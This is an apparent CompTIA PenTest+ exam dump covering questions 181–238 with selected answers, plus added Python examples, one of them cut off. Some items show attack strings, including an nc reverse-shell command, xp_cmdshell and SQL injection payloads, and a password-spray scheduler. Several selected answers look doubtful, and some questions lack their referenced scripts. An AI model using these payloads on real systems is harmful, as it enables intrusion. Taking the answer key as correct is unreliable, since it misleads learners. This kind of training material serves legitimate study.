PT0-002: CompTIA PenTest+ Certification Exam Topic 4
Question #: 181
Topic #: 1
Given the following script:
Which of the following BEST characterizes the function performed by lines 5 and 6?
A. Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10
B. Performs a single DNS query for www.comptia.org and prints the raw data output
C. Loops through variable b to count the results returned for the DNS query and prints that count to screen
D. Prints each DNS query result already stored in variable b
Selected Answer: D
Question #: 182
Topic #: 1
A penetration-testing team needs to test the security of electronic records in a company’s office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?
A. Prying the lock open on the records room
B. Climbing in an open window of the adjoining building
C. Presenting a false employee ID to the night guard
D. Obstructing the motion sensors in the hallway of the records room
Selected Answer: C
Question #: 183
Topic #: 1
A penetration tester discovers during a recent test that an employee in the accounting department had been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to discourage this type of activity in the future?
A. Enforce mandatory employee vacations.
B. Implement multifactor authentication.
C. Install video surveillance equipment in the office.
D. Encrypt passwords for bank account information.
Selected Answer: A
Question #: 184
Topic #: 1
A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?
A. Configure wireless access to use a AAA server.
B. Use random MAC addresses on the penetration testing distribution.
C. Install a host-based firewall on the penetration testing distribution.
D. Connect to the penetration testing company’s VPS using a VPN.
Selected Answer: D
Question #: 185
Topic #: 1
A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system. After running a few commands, the tester runs the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Which of the following actions is the penetration tester performing?
A. Privilege escalation
B. Upgrading the shell
C. Writing a script for persistence
D. Building a bind shell
Selected Answer: B
Question #: 186
Topic #: 1
A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?
A. Set up a captive portal with embedded malicious code.
B. Capture handshakes from wireless clients to crack.
C. Span deauthentication packets to the wireless clients.
D. Set up another access point and perform an evil twin attack.
Selected Answer: D
Question #: 187
Topic #: 1
A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?
A. Segment the firewall from the cloud.
B. Scan the firewall for vulnerabilities.
C. Notify the client about the firewall.
D. Apply patches to the firewall.
Selected Answer: C
Question #: 188
Topic #: 1
A penetration tester is looking for vulnerabilities within a company’s web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:
1;SELECT Username, Password FROM Users;
Which of the following injection attacks is the penetration tester using?
A. Blind SQL
B. Boolean SQL
C. Stacked queries
D. Error-based
Selected Answer: C
Question #: 189
Topic #: 1
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
A. Dictionary
B. Directory
C. Symlink
D. Catalog
E. For-loop
Selected Answer: A
Question #: 190
Topic #: 1
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?
A. inurl:
B. link:
C. site:
D. intitle:
Selected Answer: C
Question #: 191
Topic #: 1
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client’s expectations?
A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis
Selected Answer: B
Question #: 192
Topic #: 1
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?
A. The SSL certificates were invalid.
B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.
Selected Answer: B
Question #: 193
Topic #: 1
A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:
x' OR role LIKE '%admin%
Which of the following should be recommended to remediate this vulnerability?
A. Multifactor authentication
B. Encrypted communications
C. Secure software development life cycle
D. Parameterized queries
Selected Answer: D
Question #: 194
Topic #: 1
The following output is from reconnaissance on a public-facing banking website:
Based on these results, which of the following attacks is MOST likely to succeed?
A. A birthday attack on 64-bit ciphers (Sweet32)
B. An attack that breaks RC4 encryption
C. An attack on a session ticket extension (Ticketbleed)
D. A Heartbleed attack
Selected Answer: B
Question #: 195
Topic #: 1
Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?
A. SOW
B. SLA
C. MSA
D. NDA
Selected Answer: A
Question #: 196
Topic #: 1
In Python socket programming, SOCK_DGRAM type is:
A. reliable.
B. matrixed.
C. connectionless.
D. slower.
Selected Answer: C
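Worked example (added here; not part of the exam item or any CompTIA material): the difference between SOCK_DGRAM and SOCK_STREAM shows up directly in the socket API. The UDP echo server below never calls listen() or accept(), the client never calls connect(), and a datagram sent to a port with no listener is handed to the kernel without any error because there is no handshake that could fail. Everything runs on 127.0.0.1 with an OS-chosen port; the payloads are constructed for the example.

```python
import socket
import threading


def udp_echo_server(sock, stop):
    """Reply to each datagram with its upper-cased contents.

    There is no listen()/accept(): a SOCK_DGRAM socket simply reads whatever
    datagram arrives next, and recvfrom() hands back the sender's address so
    the server can answer it.
    """
    sock.settimeout(0.2)
    while not stop.is_set():
        try:
            data, peer = sock.recvfrom(2048)
        except socket.timeout:
            continue
        sock.sendto(data.upper(), peer)


def datagram_roundtrip(payload=b"hello"):
    """Send one datagram to a local UDP echo server and return (reply, peer_ip).

    The client never calls connect(): every sendto() names its own destination,
    which is what 'connectionless' means at the API level.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    port = server.getsockname()[1]
    stop = threading.Event()
    worker = threading.Thread(target=udp_echo_server, args=(server, stop), daemon=True)
    worker.start()

    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(2.0)
    try:
        client.sendto(payload, ("127.0.0.1", port))
        reply, peer = client.recvfrom(2048)
    finally:
        stop.set()
        worker.join()
        client.close()
        server.close()
    return reply, peer[0]


def send_to_nobody(payload=b"probe"):
    """Send a datagram to a port with no listener and report what the API tells us.

    sendto() returns the number of bytes handed to the kernel, not proof of
    delivery: nothing is 'connected', so nothing refuses. Returns
    (bytes_sent, reply_or_None).
    """
    # Bind a socket to learn a free port, then close it so nothing listens there.
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    probe.bind(("127.0.0.1", 0))
    dead_port = probe.getsockname()[1]
    probe.close()

    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(0.5)
    try:
        sent = client.sendto(payload, ("127.0.0.1", dead_port))
        try:
            reply, _ = client.recvfrom(2048)
        except (socket.timeout, OSError):
            reply = None                   # no answer, and no error at send time
    finally:
        client.close()
    return sent, reply


if __name__ == "__main__":
    print(datagram_roundtrip(b"pentest"))
    print(send_to_nobody())
```

The second function is the reason UDP scans are slow and ambiguous: "no reply" can mean closed, filtered, or simply lost, and the unconnected socket gets no ICMP port-unreachable error back from the kernel.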
Question #: 197
Topic #: 1
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?
A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures
Selected Answer: B
Question #: 198
Topic #: 1
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file:
Which of the following actions should the tester perform FIRST?
A. Change the file permissions.
B. Use privilege escalation.
C. Cover tracks.
D. Start a reverse shell.
Selected Answer: D
Question #: 199
Topic #: 1
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?
A. An unknown-environment assessment
B. A known-environment assessment
C. A red-team assessment
D. A compliance-based assessment
Selected Answer: C
Question #: 200
Topic #: 1
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client’s data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester’s decision?
A. The tester had the situational awareness to stop the transfer.
B. The tester found evidence of prior compromise within the data set.
C. The tester completed the assigned part of the assessment workflow.
D. The tester reached the end of the assessment time frame.
Selected Answer: A
Question #: 201
Topic #: 1
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
Selected Answer: E
Question #: 202
Topic #: 1
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?
A. Situational awareness
B. Rescheduling
C. DDoS defense
D. Deconfliction
Selected Answer: D
Question #: 203
Topic #: 1
Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?
A. Exploit-DB
B. Metasploit
C. Shodan
D. Retina
Selected Answer: B
Question #: 204
Topic #: 1
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?
A. To trick the systems administrator into installing a rootkit
B. To close down a reverse shell
C. To remove a web shell after the penetration test
D. To delete credentials the tester created
Selected Answer: C
Question #: 205
Topic #: 1
The following PowerShell snippet was extracted from a log of an attacker machine:
A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?
A. Line 8
B. Line 13
C. Line 19
D. Line 20
Selected Answer: A
Question #: 206
Topic #: 1
A company provided the following network scope for a penetration test:
• 169.137.1.0/24
• 221.10.1.0/24
• 149.14.1.0/24
A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?
A. The company that requested the penetration test
B. The penetration testing company
C. The target host’s owner
D. The penetration tester
E. The subcontractor supporting the test
Selected Answer: A
Question #: 207
Topic #: 1
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manager/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Create a TPM-backed sealed storage location within which the unprotected file repository can be reported.
Selected Answer: A
Question #: 208
Topic #: 1
During the reconnaissance phase, a penetration tester obtains the following output:
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
Which of the following operating systems is MOST likely installed on the host?
A. Linux
B. NetBSD
C. Windows
D. macOS
Selected Answer: C
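Worked example (added here; not part of the exam item): the reasoning behind the answer is TTL-based OS fingerprinting. Each router hop decrements the TTL by one, so the observed value is rounded up to the nearest common default (64 for Linux, macOS and the BSDs; 128 for Windows; 255 for many network devices and Solaris) and the difference is the hop count. The parser below runs over the four ping replies from the question, embedded as a constructed sample, and also handles a host several hops away. The OS table is a heuristic: administrators can change the default TTL, and a load balancer in the path can mix values.

```python
import re

# Common default initial TTLs. Heuristic: hosts can override these.
INITIAL_TTLS = {
    64: "Linux/macOS/BSD",
    128: "Windows",
    255: "Network device/Solaris",
}

# Constructed sample: the four replies shown in the question above.
SAMPLE_PING_OUTPUT = """\
Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128
"""

# Matches both Windows ("TTL=128") and Unix ("ttl=64") ping output.
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def observed_ttls(ping_output):
    """Extract every TTL value from raw ping output, in order."""
    return [int(m.group(1)) for m in TTL_RE.finditer(ping_output)]


def guess_initial_ttl(observed):
    """Round the observed TTL up to the smallest default that could produce it."""
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return initial
    raise ValueError("TTL %d exceeds every known default" % observed)


def fingerprint(ping_output):
    """Return observed TTL, inferred initial TTL, hop count and OS family."""
    ttls = observed_ttls(ping_output)
    if not ttls:
        raise ValueError("no TTL values found in ping output")
    if len(set(ttls)) != 1:
        # Mixed TTLs usually mean more than one real host answers (load balancer,
        # anycast) and a single OS guess would be misleading.
        raise ValueError("inconsistent TTLs %s; cannot attribute to one host" % sorted(set(ttls)))
    observed = ttls[0]
    initial = guess_initial_ttl(observed)
    return {
        "observed_ttl": observed,
        "initial_ttl": initial,
        "hops": initial - observed,
        "os_family": INITIAL_TTLS[initial],
    }


if __name__ == "__main__":
    print(fingerprint(SAMPLE_PING_OUTPUT))
```

A TTL of 128 with the target on the same subnet (zero hops) is the cleanest case; a reply with TTL=118 from a remote host still points at Windows, ten hops away. Confirm with a second signal (TCP window size, service banners, an Nmap -O run) before relying on it.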
Question #: 209
Topic #: 1
A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?
A. Prohibiting exploitation in the production environment
B. Requiring all testers to review the scoping document carefully
C. Never assessing the production networks
D. Prohibiting testers from joining the team during the assessment
Selected Answer: B
Question #: 210
Topic #: 1
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
A. MD5
B. bcrypt
C. SHA-1
D. PBKDF2
Selected Answer: A
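Worked example (added here; not part of the exam item): why unsalted MD5 falls to a precomputed table while the salted, iterated options on the list do not. The table below is a small dictionary lookup standing in for a rainbow table (a rainbow table trades storage for recomputation, but the attack has the same shape: build once, look up many). bcrypt is not in the Python standard library, so the salted alternative shown is PBKDF2-HMAC-SHA256 from hashlib, which is option D on the page. The wordlist and passwords are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the dictionary behind a rainbow table.
WORDLIST = ["password", "Winter2023!", "letmein", "qwerty", "Summer2022"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def build_md5_table(words):
    """Precompute digest -> plaintext for unsalted MD5.

    MD5 is fast and, used this way, unsalted: the same password always yields
    the same digest, so a table built once cracks every database that used it.
    """
    return {md5_hex(w): w for w in words}


def crack_md5(stored_hex, table):
    """One dictionary lookup. This is what 'cracked with rainbow tables' costs."""
    return table.get(stored_hex)


def pbkdf2_store(password, salt=None, iterations=600_000):
    """Return a self-describing salted, stretched hash: algo$iterations$salt$digest."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2_with_table(stored, table):
    """Try the precomputed table against a salted hash.

    The digest depends on a per-user random salt that did not exist when the
    table was built, so no lookup can match. The attacker is pushed back to
    guessing per hash and pays the full iteration count for every guess.
    """
    digest_hex = stored.split("$")[-1]
    return table.get(digest_hex)


if __name__ == "__main__":
    table = build_md5_table(WORDLIST)
    print(crack_md5(md5_hex("Winter2023!"), table))
    stored = pbkdf2_store("Winter2023!")
    print(stored)
    print(crack_pbkdf2_with_table(stored, table), pbkdf2_verify("Winter2023!", stored))
```

The same plaintext stored twice with pbkdf2_store() yields two different strings, which is the property that makes a shared precomputed table useless; SHA-1 (option C) has the same weakness as MD5 here because it is also fast and unsalted.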
Question #: 211
Topic #: 1
A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?
A. The injection was too slow.
B. The DNS information was incorrect.
C. The DNS cache was not refreshed.
D. The client did not receive a trusted response.
Selected Answer: D
Question #: 212
Topic #: 1
During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?
A. Changing to Wi-Fi equipment that supports strong encryption
B. Using directional antennae
C. Using WEP encryption
D. Disabling Wi-Fi
Selected Answer: B
Question #: 213
Topic #: 1
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:
Which of the following should the penetration tester do NEXT?
A. Close the reverse shell the tester is using.
B. Note this finding for inclusion in the final report.
C. Investigate the high numbered port connections.
D. Contact the client immediately.
Selected Answer: C
Question #: 214
Topic #: 1
A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:
IP Address: 192.168.1.63
Physical Address: 60-36-dd-a6-c5-33
Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?
A. tcpdump -i eth01 arp and arp[6:2] == 2
B. arp -s 192.168.1.63 60-36-DD-A6-C5-33
C. ipconfig /all findstr /v 00-00-00 | findstr Physical
D. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1
Selected Answer: B
Question #: 215
Topic #: 1
During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?
A. Vulnerability scanning
B. Network segmentation
C. System hardening
D. Intrusion detection
Selected Answer: B
Question #: 216
Topic #: 1
A security analyst needs to perform a scan for SMB port 445 over a /16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?
A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
C. Nmap -sV --script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172.21.0.0/16
Selected Answer: B
Question #: 217
Topic #: 1
A penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?
A. Peach
B. WinDbg
C. GDB
D. OllyDbg
Selected Answer: C
Question #: 218
Topic #: 1
A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible.
Which of the following remediation techniques would be the BEST to recommend? (Choose two.)
A. Closing open services
B. Encrypting users' passwords
C. Randomizing users' credentials
D. Users' input validation
E. Parameterized queries
F. Output encoding
Selected Answer: D, E
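Worked example (added here; not part of the exam item): the two recommended controls side by side with the vulnerable code they replace, exercised with the payload quoted in the red-team report a few questions earlier (x' OR role LIKE '%admin%). The in-memory SQLite table, account names and passwords are constructed for the example. Note where the payload lands: supplied in the password field, the closing quote from the template turns the WHERE clause into (username = 'guest' AND password = 'x') OR role LIKE '%admin%', which selects any administrative account.

```python
import re
import sqlite3

# Payload quoted in the red-team report above: closes the string literal, then
# ORs in a condition that is true for every account whose role contains 'admin'.
REPORTED_PAYLOAD = "x' OR role LIKE '%admin%"

USERNAME_RE = re.compile(r"^[a-z0-9_.-]{1,64}$")


def make_db():
    """Constructed in-memory users table (example data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "Winter2023!", "user"), ("svc_admin", "c0rrect-h0rse", "admin")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement with string formatting: input becomes SQL grammar."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    """Same query with bound parameters (option E): input is only ever a value."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def login_validated(conn, username, password, max_password_len=128):
    """Input validation (option D) in front of the parameterized query.

    The username is checked against an allowlist pattern and the password
    length is capped. Passwords legitimately contain quotes and semicolons, so
    validation cannot be the only defence; the bound parameters are what stop
    the injection.
    """
    if not USERNAME_RE.match(username) or len(password) > max_password_len:
        return None
    return login_parameterized(conn, username, password)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", login_vulnerable(db, "guest", REPORTED_PAYLOAD))
    print("parameterized: ", login_parameterized(db, "guest", REPORTED_PAYLOAD))
    print("validated:     ", login_validated(db, "guest", REPORTED_PAYLOAD))
```

Stacked queries (the 1;SELECT ... pattern from question 188) are a separate concern the driver may or may not allow; sqlite3's execute() refuses more than one statement, whereas some MSSQL and MySQL driver configurations accept them, which is why parameterization rather than driver behaviour is the control to recommend.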
Question #: 219
Topic #: 1
Which of the following is a rules engine for managing public cloud accounts and resources?
A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite
Selected Answer: A
Question #: 220
Topic #: 1
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?
A. -a8 -T0
B. --script "http*vuln*"
C. -sn
D. -O -A
Selected Answer: B
Question #: 221
Topic #: 1
A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?
A. Credential harvesting
B. Privilege escalation
C. Password spraying
D. Domain record abuse
Selected Answer: A
Question #: 222
Topic #: 1
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?
A. Mask
B. Rainbow
C. Dictionary
D. Password spraying
Selected Answer: D
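Worked example (added here; not part of the exam item): the two steps the question describes, turning crawled addresses into candidate usernames and then ordering attempts so that no single account reaches the lockout threshold. Spraying is password-major: one password against every user, then the next, pausing for the lockout observation window after threshold-minus-one rounds. Nothing is sent anywhere; the functions only produce and verify the plan. The three addresses and the lockout policy (5 failures in 30 minutes) are constructed values; the real policy should come from the client or from observing a test account.

```python
from collections import defaultdict

# Constructed addresses standing in for the 30 crawled from the target site.
CRAWLED_EMAILS = [
    "jane.doe@example.com",
    "john.smith@example.com",
    "a.lee@example.com",
]


def derive_usernames(emails):
    """Expand each first.last mailbox into the username formats commonly paired with it."""
    candidates = set()
    for addr in emails:
        local = addr.split("@", 1)[0].lower()
        candidates.add(local)                       # jane.doe
        if "." in local:
            first, last = local.split(".", 1)
            candidates.add(first[0] + last)         # jdoe
            candidates.add(first + "_" + last)      # jane_doe
            candidates.add(first + last[0])         # janed
    return sorted(candidates)


def spray_schedule(users, passwords, lockout_threshold, observation_minutes, margin_minutes=5):
    """Return (minute, username, password) attempts ordered so no account is locked.

    After lockout_threshold - 1 passwords have been tried against every user,
    the schedule waits out the observation window (plus a safety margin,
    because implementations differ on whether the window is inclusive).
    """
    if lockout_threshold < 2:
        raise ValueError("a threshold of 1 leaves no safe attempt")
    per_window = lockout_threshold - 1
    schedule = []
    minute = 0
    for i, password in enumerate(passwords, start=1):
        for user in users:
            schedule.append((minute, user, password))
        if i % per_window == 0 and i < len(passwords):
            minute += observation_minutes + margin_minutes
    return schedule


def max_attempts_in_window(schedule, observation_minutes):
    """Worst-case failures any single account would see inside one observation window.

    Assumes every attempt fails, which is the conservative case for lockout.
    """
    times = defaultdict(list)
    for minute, user, _ in schedule:
        times[user].append(minute)
    worst = 0
    for user_times in times.values():
        user_times.sort()
        for i, start in enumerate(user_times):
            in_window = sum(1 for t in user_times[i:] if t < start + observation_minutes)
            worst = max(worst, in_window)
    return worst


if __name__ == "__main__":
    users = derive_usernames(CRAWLED_EMAILS)
    plan = spray_schedule(users, ["Winter2023!", "Spring2024!", "Summer2024!",
                                  "Password1", "Welcome1", "Company123"],
                          lockout_threshold=5, observation_minutes=30)
    for minute, user, password in plan:
        print("t+%03dm  %-12s %s" % (minute, user, password))
    print("worst case per account:", max_attempts_in_window(plan, 30))
```

Contrast this with a dictionary attack, which is user-major: many passwords against one account in quick succession, which is exactly what trips lockout. Verifying the plan with max_attempts_in_window() before running it is the check that keeps a spray from turning into a denial of service against the client's staff.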
Question #: 223
Topic #: 1
The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine?
A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt
B. nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d "" -f5 > live-hosts.txt
C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service
D. nmap -sS -Pn -n -iL target.txt -oA target_txt1
Selected Answer: A
Question #: 224
Topic #: 1
Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?
A. DirBuster
B. CeWL
C. w3af
D. Patator
Selected Answer: B
Question #: 225
Topic #: 1
A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:
http://company.com/catalog.asp?productid=22
The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:
http://company.com/catalog.asp?productid=22;WAITFOR DELAY '00:00:05'
Which of the following should the penetration tester attempt NEXT?
A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
B. http://company.com/catalog.asp?productid=22' OR 1=1 --
C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash
Selected Answer: B
Question #: 226
Topic #: 1
The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?
A. A vulnerability scan
B. A WHOIS lookup
C. A packet capture
D. An Nmap scan
Selected Answer: A
Question #: 227
Topic #: 1
After running the enum4linux.pl command, a penetration tester received the following output:
Which of the following commands should the penetration tester run NEXT?
A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U ""
C. smbget //192.168.100.56/web -U ""
D. smbclient //192.168.100.56/web -U "" -N
Selected Answer: C
Question #: 228
Topic #: 1
During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?
A. Badge cloning
B. Watering-hole attack
C. Impersonation
D. Spear phishing
Selected Answer: D
Question #: 229
Topic #: 1
Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?
A. PCI DSS
B. ISO 27001
C. SOX
D. GDPR
Selected Answer: A
Question #: 230
Topic #: 1
A penetration tester successfully infiltrated the targeted web server and created credentials with administrative privileges. After conducting data exfiltration, which of the following should be the tester’s NEXT step?
A. Determine what data is available on the web server.
B. Change or delete the logs.
C. Log out and migrate to a new session.
D. Log in as the new user.
Selected Answer: B
Question #: 231
Topic #: 1
A penetration tester analyzed a web-application log file and discovered an input that was sent to the company’s web application. The input contains a string that says “WAITFOR.” Which of the following attacks is being attempted?
A. SQL injection
B. HTML injection
C. Remote command injection
D. DLL injection
Selected Answer: A
Question #: 232
Topic #: 1
Given the following code:
Which of the following data structures is systems?
A. A tuple
B. A tree
C. An array
D. A dictionary
Selected Answer: D
Question #: 233
Topic #: 1
A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?
A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
Selected Answer: D
Question #: 234
Topic #: 1
The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?
A. Statement of work
B. Program scope
C. Non-disclosure agreement
D. Rules of engagement
Selected Answer: D
Question #: 235
Topic #: 1
A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?
A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.
Selected Answer: D
Question #: 236
Topic #: 1
The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:
A. NDA
B. SLA
C. MSA
D. SOW
Selected Answer: A
Question #: 237
Topic #: 1
A penetration tester created the following script to use in an engagement:
However, the tester is receiving the following error when trying to run the script:
Which of the following is the reason for the error?
A. The sys variable was not defined.
B. The argv variable was not defined.
C. The sys module was not imported.
D. The argv module was not imported.
Selected Answer: C
Question #: 238
Topic #: 1
A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?
A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog
Selected Answer: D
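Worked example (added here; not part of the exam item): /var/log/lastlog is a binary file, not text, so grep will not read it. It is an array of fixed-size records indexed by UID, each holding the time, terminal and remote host of that user's most recent login. The layout assumed below is the glibc x86-64 one (a 32-bit time, a 32-byte line, a 256-byte host; 292 bytes per record); other libc builds differ, so check struct lastlog in <lastlog.h> on the target. The sample image is constructed in the script so it runs offline; on a real host read the file with open("/var/log/lastlog", "rb").

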